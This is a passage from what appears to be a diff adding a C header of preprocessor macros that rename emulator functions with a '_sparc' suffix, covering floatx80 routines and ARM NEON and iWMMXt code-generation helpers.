floatx80_sqrt_sparc +#define floatx80_sub floatx80_sub_sparc +#define floatx80ToCommonNaN floatx80ToCommonNaN_sparc +#define floatx80_to_float128 floatx80_to_float128_sparc +#define floatx80_to_float32 floatx80_to_float32_sparc +#define floatx80_to_float64 floatx80_to_float64_sparc +#define floatx80_to_int32 floatx80_to_int32_sparc +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc +#define floatx80_to_int64 floatx80_to_int64_sparc +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc +#define floatx80_unordered floatx80_unordered_sparc +#define floatx80_unordered_quiet floatx80_unordered_quiet_sparc +#define flush_icache_range flush_icache_range_sparc +#define format_string format_string_sparc +#define fp_decode_rm fp_decode_rm_sparc +#define frame_dummy frame_dummy_sparc +#define free_range free_range_sparc +#define fstat64 fstat64_sparc +#define futex_wait futex_wait_sparc +#define futex_wake futex_wake_sparc +#define gen_aa32_ld16s gen_aa32_ld16s_sparc +#define gen_aa32_ld16u gen_aa32_ld16u_sparc +#define gen_aa32_ld32u gen_aa32_ld32u_sparc +#define gen_aa32_ld64 gen_aa32_ld64_sparc +#define gen_aa32_ld8s gen_aa32_ld8s_sparc +#define gen_aa32_ld8u gen_aa32_ld8u_sparc +#define gen_aa32_st16 gen_aa32_st16_sparc +#define gen_aa32_st32 gen_aa32_st32_sparc +#define gen_aa32_st64 gen_aa32_st64_sparc +#define gen_aa32_st8 gen_aa32_st8_sparc +#define gen_adc gen_adc_sparc +#define gen_adc_CC gen_adc_CC_sparc +#define gen_add16 gen_add16_sparc +#define gen_add_carry gen_add_carry_sparc +#define gen_add_CC gen_add_CC_sparc +#define gen_add_datah_offset gen_add_datah_offset_sparc +#define gen_add_data_offset gen_add_data_offset_sparc +#define gen_addq gen_addq_sparc +#define gen_addq_lo gen_addq_lo_sparc +#define gen_addq_msw gen_addq_msw_sparc +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_sparc +#define gen_arm_shift_im gen_arm_shift_im_sparc +#define gen_arm_shift_reg gen_arm_shift_reg_sparc +#define gen_bx gen_bx_sparc +#define gen_bx_im gen_bx_im_sparc +#define gen_clrex gen_clrex_sparc +#define generate_memory_topology generate_memory_topology_sparc +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_sparc +#define gen_exception gen_exception_sparc +#define gen_exception_insn gen_exception_insn_sparc +#define gen_exception_internal gen_exception_internal_sparc +#define gen_exception_internal_insn gen_exception_internal_insn_sparc +#define gen_exception_return gen_exception_return_sparc +#define gen_goto_tb gen_goto_tb_sparc +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_sparc +#define gen_helper_add_saturate gen_helper_add_saturate_sparc +#define gen_helper_add_setq gen_helper_add_setq_sparc +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_sparc +#define gen_helper_clz32 gen_helper_clz32_sparc +#define gen_helper_clz64 gen_helper_clz64_sparc +#define gen_helper_clz_arm gen_helper_clz_arm_sparc +#define gen_helper_cpsr_read gen_helper_cpsr_read_sparc +#define gen_helper_cpsr_write gen_helper_cpsr_write_sparc +#define gen_helper_crc32_arm gen_helper_crc32_arm_sparc +#define gen_helper_crc32c gen_helper_crc32c_sparc +#define gen_helper_crypto_aese gen_helper_crypto_aese_sparc +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_sparc +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_sparc +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_sparc +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_sparc +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_sparc +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_sparc +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_sparc +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_sparc +#define gen_helper_double_saturate gen_helper_double_saturate_sparc +#define gen_helper_exception_internal gen_helper_exception_internal_sparc +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_sparc +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_sparc +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_sparc +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_sparc +#define gen_helper_get_user_reg gen_helper_get_user_reg_sparc +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_sparc +#define gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_sparc +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_sparc +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_sparc +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_sparc +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_sparc +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_sparc +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_sparc +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_sparc +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_sparc +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_sparc +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_sparc +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_sparc +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_sparc +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_sparc +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_sparc +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_sparc +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_sparc +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_sparc +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_sparc +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_sparc +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_sparc +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_sparc +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_sparc +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_sparc +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_sparc +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_sparc +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_sparc +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_sparc +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_sparc +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_sparc +#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_sparc +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_sparc +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_sparc +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_sparc +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_sparc +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_sparc +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_sparc +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_sparc +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_sparc +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_sparc +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_sparc +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_sparc +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_sparc +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_sparc +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_sparc +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_sparc +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_sparc +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_sparc +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_sparc +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_sparc +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_sparc +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_sparc +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_sparc +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_sparc +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_sparc +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_sparc +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_sparc +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_sparc +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_sparc +#define gen_helper_iwmmxt_packuq gen_helper_iwmmxt_packuq_sparc +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_sparc +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_sparc +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_sparc +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_sparc +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_sparc +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_sparc +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_sparc +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_sparc +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_sparc +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_sparc +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_sparc +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_sparc +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_sparc +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_sparc +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_sparc +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_sparc +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_sparc +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_sparc +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_sparc +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_sparc +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_sparc +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_sparc +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_sparc +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_sparc +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_sparc +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_sparc +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_sparc +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_sparc +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_sparc +#define gen_helper_iwmmxt_unpackhsl gen_helper_iwmmxt_unpackhsl_sparc +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_sparc +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_sparc +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_sparc +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_sparc +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_sparc +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_sparc +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_sparc +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_sparc +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_sparc +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_sparc +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_sparc +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_sparc +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_sparc +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_sparc +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_sparc +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_sparc +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_sparc +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_sparc +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_sparc +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_sparc +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_sparc +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_sparc +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_sparc +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_sparc +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_sparc +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_sparc +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_sparc +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_sparc +#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_sparc +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_sparc +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_sparc +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_sparc +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_sparc +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_sparc +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_sparc +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_sparc +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_sparc +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_sparc +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_sparc +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_sparc +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_sparc +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_sparc +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_sparc +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_sparc +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_sparc +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_sparc +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_sparc +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_sparc +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_sparc +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_sparc +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_sparc +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_sparc +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_sparc +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_sparc +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_sparc +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_sparc +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_sparc +#define gen_helper_neon_cls_s8 gen_helper_neon_cls_s8_sparc +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_sparc +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_sparc +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_sparc +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_sparc +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_sparc +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_sparc +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_sparc +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_sparc +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_sparc +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_sparc +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_sparc +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_sparc +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_sparc +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_sparc +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_sparc +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_sparc +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_sparc +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_sparc +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_sparc +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_sparc +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_sparc +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_sparc +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_sparc +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_sparc +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_sparc +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_sparc +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_sparc +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_sparc +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_sparc +#define gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_sparc +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_sparc +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_sparc +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_sparc +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_sparc +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_sparc +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_sparc +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_sparc +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_sparc +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_sparc +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_sparc +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_sparc +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_sparc +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_sparc +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_sparc +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_sparc +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_sparc +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_sparc +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_sparc +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_sparc +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_sparc +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_sparc +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_sparc +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_sparc +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_sparc +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_sparc +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_sparc +#define gen_helper_neon_pmax_s8 gen_helper_neon_pmax_s8_sparc +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_sparc +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_sparc +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_sparc +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_sparc +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_sparc +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_sparc +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_sparc +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_sparc +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_sparc +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_sparc +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_sparc +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_sparc +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_sparc +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_sparc +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_sparc +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_sparc +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_sparc +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_sparc +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_sparc +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_sparc +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_sparc +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_sparc +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_sparc +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_sparc +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_sparc +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_sparc +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_sparc +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_sparc +#define gen_helper_neon_qrshl_s64 gen_helper_neon_qrshl_s64_sparc +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_sparc +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_sparc +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_sparc +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_sparc +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_sparc +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_sparc +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_sparc +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_sparc +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_sparc +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_sparc +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_sparc +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_sparc +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_sparc +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_sparc +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_sparc +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_sparc +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_sparc +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_sparc +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_sparc +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_sparc +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_sparc +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_sparc +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_sparc +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_sparc +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_sparc +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_sparc +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_sparc +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_sparc +#define gen_helper_neon_qzip16 gen_helper_neon_qzip16_sparc +#define gen_helper_neon_qzip32 gen_helper_neon_qzip32_sparc +#define gen_helper_neon_qzip8 gen_helper_neon_qzip8_sparc +#define gen_helper_neon_rhadd_s16 gen_helper_neon_rhadd_s16_sparc +#define gen_helper_neon_rhadd_s32 gen_helper_neon_rhadd_s32_sparc +#define gen_helper_neon_rhadd_s8 gen_helper_neon_rhadd_s8_sparc +#define gen_helper_neon_rhadd_u16 gen_helper_neon_rhadd_u16_sparc +#define gen_helper_neon_rhadd_u32 gen_helper_neon_rhadd_u32_sparc +#define gen_helper_neon_rhadd_u8 gen_helper_neon_rhadd_u8_sparc +#define gen_helper_neon_rshl_s16 gen_helper_neon_rshl_s16_sparc +#define gen_helper_neon_rshl_s32 gen_helper_neon_rshl_s32_sparc +#define gen_helper_neon_rshl_s64 gen_helper_neon_rshl_s64_sparc +#define gen_helper_neon_rshl_s8 gen_helper_neon_rshl_s8_sparc +#define gen_helper_neon_rshl_u16 gen_helper_neon_rshl_u16_sparc +#define gen_helper_neon_rshl_u32 gen_helper_neon_rshl_u32_sparc +#define gen_helper_neon_rshl_u64 gen_helper_neon_rshl_u64_sparc +#define gen_helper_neon_rshl_u8 gen_helper_neon_rshl_u8_sparc +#define gen_helper_neon_shl_s16 gen_helper_neon_shl_s16_sparc +#define gen_helper_neon_shl_s32 gen_helper_neon_shl_s32_sparc +#define gen_helper_neon_shl_s64 gen_helper_neon_shl_s64_sparc +#define gen_helper_neon_shl_s8 gen_helper_neon_shl_s8_sparc +#define gen_helper_neon_shl_u16 gen_helper_neon_shl_u16_sparc +#define gen_helper_neon_shl_u32 gen_helper_neon_shl_u32_sparc +#define gen_helper_neon_shl_u64 gen_helper_neon_shl_u64_sparc +#define gen_helper_neon_shl_u8 gen_helper_neon_shl_u8_sparc +#define gen_helper_neon_subl_u16 gen_helper_neon_subl_u16_sparc +#define gen_helper_neon_subl_u32 gen_helper_neon_subl_u32_sparc +#define gen_helper_neon_sub_u16 gen_helper_neon_sub_u16_sparc +#define gen_helper_neon_sub_u8 gen_helper_neon_sub_u8_sparc +#define gen_helper_neon_tbl gen_helper_neon_tbl_sparc +#define gen_helper_neon_tst_u16 gen_helper_neon_tst_u16_sparc +#define gen_helper_neon_tst_u32 gen_helper_neon_tst_u32_sparc +#define gen_helper_neon_tst_u8 gen_helper_neon_tst_u8_sparc +#define gen_helper_neon_unarrow_sat16 gen_helper_neon_unarrow_sat16_sparc +#define gen_helper_neon_unarrow_sat32 gen_helper_neon_unarrow_sat32_sparc +#define gen_helper_neon_unarrow_sat8 gen_helper_neon_unarrow_sat8_sparc +#define gen_helper_neon_unzip16 gen_helper_neon_unzip16_sparc +#define gen_helper_neon_unzip8 gen_helper_neon_unzip8_sparc +#define gen_helper_neon_widen_s16 gen_helper_neon_widen_s16_sparc +#define gen_helper_neon_widen_s8 gen_helper_neon_widen_s8_sparc +#define gen_helper_neon_widen_u16 gen_helper_neon_widen_u16_sparc +#define gen_helper_neon_widen_u8 gen_helper_neon_widen_u8_sparc +#define gen_helper_neon_zip16 gen_helper_neon_zip16_sparc +#define gen_helper_neon_zip8 gen_helper_neon_zip8_sparc +#define gen_helper_pre_hvc gen_helper_pre_hvc_sparc +#define gen_helper_pre_smc gen_helper_pre_smc_sparc +#define gen_helper_qadd16 gen_helper_qadd16_sparc +#define gen_helper_qadd8 gen_helper_qadd8_sparc +#define gen_helper_qaddsubx gen_helper_qaddsubx_sparc +#define gen_helper_qsub16 gen_helper_qsub16_sparc +#define gen_helper_qsub8 gen_helper_qsub8_sparc +#define gen_helper_qsubaddx gen_helper_qsubaddx_sparc +#define gen_helper_rbit gen_helper_rbit_sparc +#define gen_helper_recpe_f32 gen_helper_recpe_f32_sparc +#define gen_helper_recpe_u32 gen_helper_recpe_u32_sparc +#define gen_helper_recps_f32 gen_helper_recps_f32_sparc +#define gen_helper_rintd gen_helper_rintd_sparc +#define gen_helper_rintd_exact gen_helper_rintd_exact_sparc +#define gen_helper_rints gen_helper_rints_sparc +#define gen_helper_rints_exact gen_helper_rints_exact_sparc +#define gen_helper_ror_cc gen_helper_ror_cc_sparc +#define gen_helper_rsqrte_f32 gen_helper_rsqrte_f32_sparc +#define gen_helper_rsqrte_u32 gen_helper_rsqrte_u32_sparc +#define gen_helper_rsqrts_f32 gen_helper_rsqrts_f32_sparc +#define gen_helper_sadd16 gen_helper_sadd16_sparc +#define gen_helper_sadd8 gen_helper_sadd8_sparc +#define gen_helper_saddsubx gen_helper_saddsubx_sparc +#define gen_helper_sar_cc gen_helper_sar_cc_sparc +#define gen_helper_sdiv gen_helper_sdiv_sparc +#define gen_helper_sel_flags gen_helper_sel_flags_sparc +#define gen_helper_set_cp_reg gen_helper_set_cp_reg_sparc +#define gen_helper_set_cp_reg64 gen_helper_set_cp_reg64_sparc +#define gen_helper_set_neon_rmode gen_helper_set_neon_rmode_sparc +#define gen_helper_set_r13_banked gen_helper_set_r13_banked_sparc +#define 